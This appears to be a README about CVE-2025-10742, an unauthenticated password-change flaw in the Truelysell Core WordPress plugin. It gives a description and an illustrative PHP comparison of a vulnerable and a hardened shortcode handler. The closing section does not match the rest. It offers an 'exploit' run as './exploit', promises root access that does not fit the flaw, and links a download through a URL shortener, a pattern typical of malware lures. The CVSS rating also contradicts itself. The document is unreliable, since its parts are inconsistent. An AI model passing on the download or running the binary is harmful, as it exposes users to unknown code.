# CVE-2025-10742
## Overview
The Truelysell Core plugin for WordPress contains a security flaw that allows unauthorized users to change the passwords of existing accounts.
## Vulnerability Details
This vulnerability arises from insufficient access controls, enabling attackers to exploit the 'truelysell_edit_staff' shortcode without authentication. Consequently, unauthenticated individuals can manipulate user passwords, which poses a significant risk of unauthorized account access, including the potential compromise of administrator privileges. Website owners using affected plugin versions are urged to implement security measures and update to the latest version to safeguard their systems.
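To make the class of defect concrete, the following is an added illustration written for this page; it is not code from the Truelysell Core plugin and does not reproduce its handler. It contrasts a shortcode callback that processes a password-change form without any authentication or authorization check against a hardened version that requires a logged-in user, a valid nonce, and the `edit_user` capability for the target account. The function names, form field names and the `example_edit_staff` shortcode tag are assumptions chosen for the example; only the WordPress API calls (`is_user_logged_in`, `wp_verify_nonce`, `current_user_can`, `wp_set_password`, `wp_nonce_field`) are real.

```php
<?php
// Added illustration of a missing-access-control shortcode handler and its fix.
// Not the plugin's code: names below are hypothetical; WordPress API calls are real.

// --- Vulnerable pattern: the handler trusts whoever submits the form ---------
function example_edit_staff_vulnerable( $atts ) {
    if ( isset( $_POST['staff_id'], $_POST['new_password'] ) ) {
        // No login check, no capability check, no nonce: any visitor who can
        // load a page that renders the shortcode can reset any account,
        // including an administrator's.
        wp_set_password( wp_unslash( $_POST['new_password'] ), absint( $_POST['staff_id'] ) );
        return '<p>Password updated.</p>';
    }
    return example_render_edit_form();
}

// --- Hardened pattern: authenticate, verify intent, then authorize -----------
function example_edit_staff_hardened( $atts ) {
    if ( ! isset( $_POST['staff_id'], $_POST['new_password'] ) ) {
        return example_render_edit_form();
    }

    // 1. Authentication: anonymous requests never reach the state change.
    if ( ! is_user_logged_in() ) {
        return '<p>You must be logged in to edit staff accounts.</p>';
    }

    // 2. CSRF protection: the submitted form must carry a nonce for this action.
    $nonce = isset( $_POST['_wpnonce'] ) ? sanitize_key( $_POST['_wpnonce'] ) : '';
    if ( ! wp_verify_nonce( $nonce, 'example_edit_staff' ) ) {
        return '<p>Invalid or expired request.</p>';
    }

    $target_id = absint( $_POST['staff_id'] );

    // 3. Authorization against the specific target: a user may change their own
    //    password, or someone else's only if WordPress grants them edit_user
    //    for that particular account (a meta capability mapped per user).
    if ( get_current_user_id() !== $target_id && ! current_user_can( 'edit_user', $target_id ) ) {
        return '<p>You are not permitted to change that account.</p>';
    }

    if ( ! get_userdata( $target_id ) ) {
        return '<p>No such account.</p>';
    }

    // Passwords are not sanitized as text (that would strip characters); the
    // value is only unslashed before hashing inside wp_set_password().
    wp_set_password( wp_unslash( $_POST['new_password'] ), $target_id );
    return '<p>Password updated.</p>';
}

// Renders the form with a nonce bound to the action checked above.
function example_render_edit_form() {
    return '<form method="post">'
        . wp_nonce_field( 'example_edit_staff', '_wpnonce', true, false )
        . '<input type="hidden" name="staff_id" value="' . esc_attr( get_current_user_id() ) . '">'
        . '<input type="password" name="new_password" autocomplete="new-password">'
        . '<button type="submit">Update password</button>'
        . '</form>';
}

// Hypothetical tag for the example; only the hardened handler is registered.
add_shortcode( 'example_edit_staff', 'example_edit_staff_hardened' );
```

The order of the checks matters: authentication first so anonymous traffic is rejected before any parsing, then the nonce so a logged-in user cannot be tricked into submitting the form cross-site, then a capability check that is evaluated against the *target* user rather than a blanket role test. For site owners the practical fix remains updating the plugin; this pattern is what to look for when auditing any other shortcode or AJAX handler that writes to user accounts.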
### CVSS V3.1
- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low
Understanding the nature of this vulnerability is crucial for system administrators and security professionals. Proper mitigation strategies can prevent unauthorized access.
### Important Note
Use this exploit responsibly and only on systems you own or have explicit permission to test.
## Example
Here is a simple example of how to use the exploit:
1. Open your terminal.
2. Run the exploit:
```bash
./exploit
```
3. If successful, you will see a message indicating that you have gained root access.
### Download [here](https://tinyurl.com/2w2ktfmd)